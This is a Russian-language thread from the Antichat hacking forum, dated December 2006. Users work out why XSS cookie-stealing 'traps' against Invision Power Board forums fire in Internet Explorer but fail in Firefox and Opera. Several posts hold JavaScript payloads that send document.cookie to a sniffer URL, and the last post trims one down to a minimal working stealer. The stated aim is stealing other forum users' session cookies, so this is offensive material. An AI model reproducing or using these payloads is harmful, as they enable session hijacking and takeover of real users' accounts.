ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss в зависимости от браузера на примере Ipb
  #1  
Старый 16.12.2006, 19:41
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию Xss в зависимости от браузера на примере Ipb

Заметил что xss ловушки срабатывают только в ИЕ на примере IPB 1.3.1 final. Решил детально изучить в чем загвоздка.

1) Установил IPB локально
2) Установил локально сниффер

подопытные браузеры : MSIE 6.0, Opera 9.01, Firefox 2.0

Предистория - я не включаю рисунки в браузере, привычка сложилась с давних пор, когда сидел в lynx или когда было мало трафика и маленькая скорость.

Естественно, если рисунки отключены, то комбинации в ловушке типа ../sniffer/image.gif обламываются, и никаких куких с ссылкой на рисунок мы не получим.

Короче приступил к тестированию. Из 8 ловушек в ИЕ на ИПБ 1.3.1 сработало 6. В Фаере или Опере ничего не сработало.

Создал тестовую хтмл, с текстом
Код:
<script>alert(document.cookie);</script> 

<img src="http://localhost/s/s.gif">  

<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
Чтобы получить куки их Оперы или Фаера надо зайти на страничку форума (под логином) и потом только на эту хтмл. Только тогда в логах сниффера будет куки и другая нам нужная инфа. То есть надо еше одно насильное действие

Отсюда вытекает вопрос - как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?
 
Ответить с цитированием

  #2  
Старый 16.12.2006, 19:55
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

----> как сделать чтоб работало во всех браузерах, и почему оно кстати не работает?

Учись и больше читай.
__________________
Full DNS report
 
Ответить с цитированием

  #3  
Старый 16.12.2006, 20:46
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

такие советы я сам регулярно раздаю, я понимаю что не все скрипты одинаково работают, и соответсвенно разные приколы с приватностью и прочим.

Короче кто может детальной обьяснить, буду очень благодарен
 
Ответить с цитированием

  #4  
Старый 18.12.2006, 22:02
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.

ЗЫ, подчисти ящик, а то он ПМ больше не принимает.

Grtzzz.
__________________
Full DNS report
 
Ответить с цитированием

  #5  
Старый 18.12.2006, 22:15
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
Сообщение от Azazel  
---> и почему оно кстати не работает?
Потому что для фф жаву разрабатывал Нетскейп, а для ИЕ - Микрософт.
то есть ты хочешь сказать что (выбрать нужное):

1) на данный момент нет готовых кодов для кражи кукисов из оперы/фаера
2) это не возможно
3) возможно, но надо рыть спецификацию
 
Ответить с цитированием

  #6  
Старый 18.12.2006, 22:43
Аватар для Azazel
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Там есть разница в синтаксисе.

Готовые коды есть в Уязвимостях форумов.

Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.

White Jordan, во всех его воплощениях, тоже неплохо описывал.

В гугле я тоже много чего читал по этому поводу.

В приведённом тобой коде первые две строчки лишние.
__________________
Full DNS report
 
Ответить с цитированием

  #7  
Старый 18.12.2006, 22:48
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
Сообщение от Azazel  
Там есть разница в синтаксисе.

Готовые коды есть в Уязвимостях форумов.
из тех что в теме "уязвимости IPB" у меня не один не сработал в Фаере/Опере


Цитата:
Сообщение от Azazel  
Егорыч+++ создавал тему с призом в двадцать баксов тем кто покажет реальную разницу в синтаксисе. Приз тогда ушёл.

White Jordan, во всех его воплощениях, тоже неплохо описывал.
линк не затруднит?


Цитата:
Сообщение от Azazel  
В гугле я тоже много чего читал по этому поводу.

В приведённом тобой коде первые две строчки лишние.
В гугле я нашел кое-что, но не по теме, а о других различиях; а приведенный пример, это лишь отладка, я пытался выяснить что, когда и как работает с его помощью. Но сейчас попробую без первых двух
 
Ответить с цитированием

  #8  
Старый 18.12.2006, 23:41
Аватар для _Great_
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код
 
Ответить с цитированием

  #9  
Старый 18.12.2006, 23:52
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
Сообщение от _Great_  
Код "img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>" спокойно покатит на лисе. насчет оперы хз, не пробовал.
Разница далеко не тут в синтаксисе, тем более, что можно писать кросс-браузерный JS код
вот зараза...с первыми двумя строчками не работает, а сама по себе отлично. Проверено в Опере, Фаере. Надо сейчас только раздуплиться как сделать в кодах это, вы тоже подсказывайте, а то у меня ступор может начаться
 
Ответить с цитированием

  #10  
Старый 19.12.2006, 00:02
Аватар для _Great_
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Зачем такой длинный код?
Код:
<script>alert(document.cookie);</script> 
<img src="http://localhost/s/s.gif">  
<script>img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
Достаточно такого:
Код:
<script>var img = new Image(); img.src = "http://localhost/s/s.gif?"+document.cookie;</script>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IPB 2.1.7 passive XSS degeneration x Форумы 20 24.02.2007 00:02
Пассивиная Xss для браузера IE методом обхода граффического фильтра __XT__ Уязвимости 13 27.11.2006 03:04
XSS vbulletin and IPB v2.1.7 With IE liauliau Форумы 6 16.08.2006 15:19
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
XSS в форуме IPB, на примере браузера Опера Fr13nd Форумы 4 13.01.2005 19:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ